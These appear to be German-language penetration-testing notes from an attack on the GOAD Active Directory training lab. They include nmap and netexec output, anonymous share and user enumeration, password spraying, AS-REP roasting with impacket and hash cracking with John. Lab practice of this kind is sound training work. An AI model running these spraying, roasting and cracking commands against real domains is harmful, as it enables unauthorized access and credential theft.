
**sudo nmap -sV 192.168.10.0/24**
```
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-28 00:01 EDT
Nmap scan report for 192.168.10.1
Host is up (0.011s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
53/tcp  open  domain   Unbound
80/tcp  open  http     nginx
443/tcp open  ssl/http nginx

Nmap scan report for 192.168.10.10
Host is up (0.012s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-28 04:01:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.10.11
Host is up (0.012s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-28 04:01:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.10.12
Host is up (0.012s latency).
Not shown: 986 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-28 04:01:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: ESSOS)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: essos.local, Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: MEEREEN; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.10.22
Host is up (0.012s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.10.23
Host is up (0.012s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (6 hosts up) scanned in 72.92 seconds
```

**nxc smb 192.168.10.0/24**
```
SMB         192.168.10.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.10.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
```


```
- nmap -p 80,443,445,3389,5985,1433 192.168.10.0/24 -oG targets.txt
- grep "Ports:" targets.txt | awk '{print $2}' > goad_hosts.txt

- sudo apt update  && upgrade -y
- sudo apt install nuclei -y
- git clone https://github.com/projectdiscovery/nuclei-templates.git ~/.local/nuclei-templates/
  
- eventuell: "nuclei -update-templates"
  
  -> nuclei AI nachinstallieren !
  
- Alle templates auflisten:
  nuclei -tl
  
- Oder mit Tags filtern:
  nuclei -tags smb -tl

- nuclei -l goad_hosts.txt -t cves/ -t smb/ -t rdp/ -t misconfiguration/

```

```
ldapsearch -x -H ldap://192.168.11.10 -s base namingcontexts
```

**Benutzer listen:**
```
net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.10.11' -U '%'
```

Ausgabe:
```
NORTH\Administrator
NORTH\vagrant
NORTH\cloudbase-init
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc
```

**Shares listen:**
Befehl:
``nxc smb 192.168.10.10-23 -u 'a' -p '' --shares

Ausgabe:
```
SMB         192.168.10.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.10   445    KINGSLANDING     [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE 
SMB         192.168.10.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\a: (Guest)
SMB         192.168.10.11   445    WINTERFELL       [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE 
SMB         192.168.10.23   445    BRAAVOS          [+] essos.local\a: (Guest)
SMB         192.168.10.12   445    MEEREEN          [-] essos.local\a: STATUS_LOGON_FAILURE 
SMB         192.168.10.22   445    CASTELBLACK      [*] Enumerated shares
SMB         192.168.10.22   445    CASTELBLACK      Share           Permissions     Remark
SMB         192.168.10.22   445    CASTELBLACK      -----           -----------     ------
SMB         192.168.10.22   445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         192.168.10.22   445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         192.168.10.22   445    CASTELBLACK      C$                              Default share
SMB         192.168.10.22   445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         192.168.10.22   445    CASTELBLACK      public                          Basic Read share for all domain users                                                                                                                   
SMB         192.168.10.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.10.23   445    BRAAVOS          Share           Permissions     Remark
SMB         192.168.10.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.10.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.10.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.10.23   445    BRAAVOS          C$                              Default share
SMB         192.168.10.23   445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share                                                                                                             
SMB         192.168.10.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.10.23   445    BRAAVOS          public                          Basic Read share for all domain users 
```

**Simpler Test, ob User ihren Benutzer als Password benutzen.
```
nxc smb 192.168.10.1-23 -u users.txt -p users.txt --no-bruteforce
```

**Password Spray**:
```
nxc smb 192.168.10.0/24 -u users.txt -p 'Sommer2024'

ODER:

nxc smb 192.168.10.0/24 -u users.txt -P /usr/share/wordlists/rockyou.txt
```

**Hashes sammeln (Kerberos-PreAuth / ASREPRoast)**
```
impacket-GetNPUsers NORTH/ -usersfile users.txt -dc-ip 192.168.10.11 -format john -outputfile asrep_hashes.txt
```
**Mit John cracken:**
```
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
```
**...und anzeigen lassen:**
```
john --show asrep_hashes.txt
```



